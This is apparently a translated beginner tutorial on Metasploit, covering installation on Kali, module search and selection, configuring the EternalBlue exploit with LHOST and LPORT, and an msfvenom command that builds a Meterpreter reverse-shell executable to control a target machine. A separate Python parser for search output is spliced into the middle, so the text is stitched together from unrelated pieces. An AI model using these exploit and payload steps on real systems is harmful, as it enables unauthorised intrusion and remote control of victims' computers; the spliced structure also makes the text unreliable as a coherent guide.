1. Installing on Kali Linux
In a terminal, run:
sudo apt-get install metasploit-framework
If the following screen appears, the installation succeeded (it does not matter if the banner artwork looks different).
2. Usage
msfconsole  # start the Metasploit console
Here are the most basic commands.
use [module name]  # load a Metasploit module, e.g. use multi/handler
search [keyword]  # search for a module
use and search can also be combined conveniently, as in the following example:
msf6 > search ms09
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/browser/ms09_002_memory_corruption 2009-02-10 normal No MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
1 exploit/windows/mssql/ms09_004_sp_replwritetovarbin 2008-12-09 good Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption
2 exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli 2008-12-09 excellent Yes MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
3 auxiliary/scanner/http/dir_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
4 auxiliary/scanner/http/ms09_020_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Authentication Bypass
5 exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
6 exploit/windows/ftp/ms09_053_ftpd_nlst 2009-08-31 great No MS09-053 Microsoft IIS FTP Server NLST Response Overflow
7 exploit/windows/fileformat/ms09_067_excel_featheader 2009-11-10 good No MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability
8 exploit/windows/browser/ms09_072_style_object 2009-11-20 normal No MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption
9 exploit/windows/browser/msvidctl_mpeg2 2009-07-05 normal No Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
10 auxiliary/dos/windows/ftp/iis_list_exhaustion 2009-09-03 normal No Microsoft IIS FTP Server LIST Stack Exhaustion
11 exploit/windows/browser/ms09_043_owc_htmlurl 2009-08-11 normal No Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
12 exploit/windows/browser/ms09_043_owc_msdso 2009-07-13 normal No Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption
13 auxiliary/dos/windows/smb/ms09_001_write normal No Microsoft SRV.SYS WriteAndX Invalid DataOffset
14 auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh normal No Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
15 auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff normal No Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
16 auxiliary/dos/windows/browser/ms09_065_eot_integer 2009-11-10 normal No Microsoft Windows EOT Font Table Directory Integer Overflow
Interact with a module by name or index. For example info 16, use 16 or use auxiliary/dos/windows/browser/ms09_065_eot_integer
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/mssql/ms09_004_sp_replwritetovarbin) >
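The search table above is easy to read by eye but awkward to reuse, because the Disclosure Date column is empty for several rows (3, 4, 13, 14, 15 above), so naive whitespace splitting puts the rank in the date column. The following is an added example, not part of the original post or of the Metasploit project: a small Python parser that turns copied `search` output into structured rows and resolves an index or a path to the full module name, mirroring the "use 16 or use auxiliary/..." hint at the bottom of the table. The sample text is a constructed subset of the page's own output with the column padding collapsed, as happens after copy and paste.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: four rows copied from the `search ms09` table above,
# with the alignment whitespace collapsed. Row 3 has no disclosure date.
SAMPLE_OUTPUT = """\
Matching Modules
================

#  Name  Disclosure Date  Rank  Check  Description
-  ----  ---------------  ----  -----  -----------
0  exploit/windows/browser/ms09_002_memory_corruption  2009-02-10  normal  No  MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
1  exploit/windows/mssql/ms09_004_sp_replwritetovarbin  2008-12-09  good  Yes  MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption
3  auxiliary/scanner/http/dir_webdav_unicode_bypass  normal  No  MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
16  auxiliary/dos/windows/browser/ms09_065_eot_integer  2009-11-10  normal  No  Microsoft Windows EOT Font Table Directory Integer Overflow

Interact with a module by name or index. For example info 16, use 16 or use auxiliary/dos/windows/browser/ms09_065_eot_integer
"""

# The rank vocabulary Metasploit prints in the Rank column.
RANKS = {"manual", "low", "average", "normal", "good", "great", "excellent"}
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")
# A data row starts with the index number followed by the module path.
ROW_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(.*)$")


@dataclass
class ModuleRow:
    index: int
    name: str
    disclosure_date: Optional[str]  # None when the column is blank
    rank: str
    check: bool  # True when the Check column says "Yes"
    description: str


def parse_search_output(text: str) -> List[ModuleRow]:
    """Parse msfconsole `search` output into ModuleRow records.

    Header, separator and hint lines are skipped; the optional date is
    recognised by its YYYY-MM-DD shape so a blank date does not shift the
    rank and check columns.
    """
    rows: List[ModuleRow] = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        index, name, rest = int(m.group(1)), m.group(2), m.group(3)
        if "/" not in name:
            continue  # not a module path (e.g. a stray numbered line)
        tokens = rest.split()
        date = None
        if tokens and DATE_RE.match(tokens[0]):
            date = tokens.pop(0)
        if len(tokens) < 2 or tokens[0] not in RANKS or tokens[1] not in ("Yes", "No"):
            continue  # malformed row: skip rather than guess column meaning
        rank, check = tokens[0], tokens[1] == "Yes"
        rows.append(ModuleRow(index, name, date, rank, check, " ".join(tokens[2:])))
    return rows


def module_type(row: ModuleRow) -> str:
    """Return the module category (exploit, auxiliary, post, ...) from its path."""
    return row.name.split("/", 1)[0]


def resolve_module(rows: List[ModuleRow], ref: str) -> Optional[str]:
    """Map a `use` argument (table index or full path) to the module path."""
    for row in rows:
        if ref == row.name or (ref.isdigit() and int(ref) == row.index):
            return row.name
    return None


if __name__ == "__main__":
    for r in parse_search_output(SAMPLE_OUTPUT):
        print(f"{r.index:>3}  {module_type(r):<9}  {r.disclosure_date or '-':<10}  {r.rank:<9}  {r.name}")
```

Because the parser keys on the date's shape and on the fixed rank vocabulary rather than on column positions, it works on output pasted from a terminal at any width. It deliberately drops rows it cannot classify instead of guessing, so an unexpected change in Metasploit's table layout shows up as missing rows rather than as silently shifted fields.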
options  # show the required options of the module currently in use
set [variable] [value]  # after entering a module, set the values of its required options
Now a closer look at this feature.
First select a module:
use exploit/windows/smb/ms17_010_eternalblue
After use [module], view its options with options:
options
Among all the options, the four most important are LHOST and LPORT (the listening IP and port) and RHOST and RPORT (the target IP and port).
Which two of these four you need to set depends on the module chosen. In the screenshot above, LHOST and LPORT have already been set.
Next, set the option values:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.1
lhost => 192.168.1.1
With that, the module is configured; run it with exploit or run.
3. Extension
Metasploit also comes with a handy companion tool: msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=8888 -f exe > home/test.exe
This generates an executable named test.exe in the home folder (a malicious program); used together with Metasploit's multi/handler module, it is used to control the target machine.
# Common msfvenom options
-p  payload; the most common is windows/meterpreter/reverse_tcp
-f  output format, e.g. exe or vbs...
-o  output file path; can also be replaced by ">" as in the command above
-a  target architecture, e.g. x86, x64, x86_64
The next post covers how msfvenom and multi/handler work together.